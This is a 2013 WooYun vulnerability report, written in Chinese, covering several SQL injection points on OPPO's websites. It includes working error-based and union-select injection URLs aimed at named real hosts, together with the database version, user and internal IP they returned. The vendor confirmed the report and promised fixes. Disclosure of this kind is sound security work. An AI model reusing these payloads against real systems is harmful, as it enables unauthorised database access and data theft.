漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-019676
漏洞标题:OPPO注入漏洞大礼包,数据库信息泄露
相关厂商:广东欧珀移动通讯有限公司
漏洞作者: kobin97
提交时间:2013-03-07 14:47
修复时间:2013-04-21 14:48
公开时间:2013-04-21 14:48
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-03-07: 细节已通知厂商并且等待厂商处理中
2013-03-07: 厂商已经确认,细节仅向厂商公开
2013-03-17: 细节向核心白帽子及相关领域专家公开
2013-03-27: 细节向普通白帽子公开
2013-04-06: 细节向实习白帽子公开
2013-04-21: 细节向公众公开
简要描述:
OPPO注入礼包
详细说明:
注入点1:
http://www.oppo.com/?q=software&d=ASCx
order by 类型注入
http://www.oppo.com/?q=software&d=ASC,%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20%28Select%20version%28%29%29%20from%20information_schema.tables%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29
error number: 1062; error message: Duplicate entry '|5.5.19-log|1' for key 'group_key'
注入点2:
http://union.oppo.com/?act=u_itemlist&queryinput=sdfsf%27fs
注入点3:
http://union.oppo.com/?act=u_example_more&itemid=862%27
注入点4:
http://www.oppo.com/index.php?q=mp3/product/detail&name=X7%27
Zandy_Mysql error
The query result is false.
error number: 1064; error message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' LIMIT 1' at line 1
SQL: SELECT * FROM oppo_mp3 WHERE 1 AND name='X7'' AND status='1' LIMIT 1
注入点5:
http://theme.oppo.com/?q=index/list&model=A209&sortby=downloads%20asc
http://theme.oppo.com/?q=index/moreRecom&model=A209&sortby=downloads&order=DESC
这两个都是order by 类型注入
注入点6:
http://www.oppo.com/?q=interface/editor&name=x905%27&fid=209
http://www.oppo.com/?q=interface/editor&name=x905%27%20and%201=2%20union%20select%201,user%28%29,3%23&fid=209
"title":"oppo_www@192.168.1.87"
就暂时这么多吧。。
漏洞证明:
上面已经证明
修复方案:
过虑,转换
版权声明:转载请注明来源 kobin97@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-03-07 17:11
厂商回复:
谢谢对OPPO的关注,部分已废弃网站尽快停用,有问题网站我们尽快修正。
最新状态:
暂无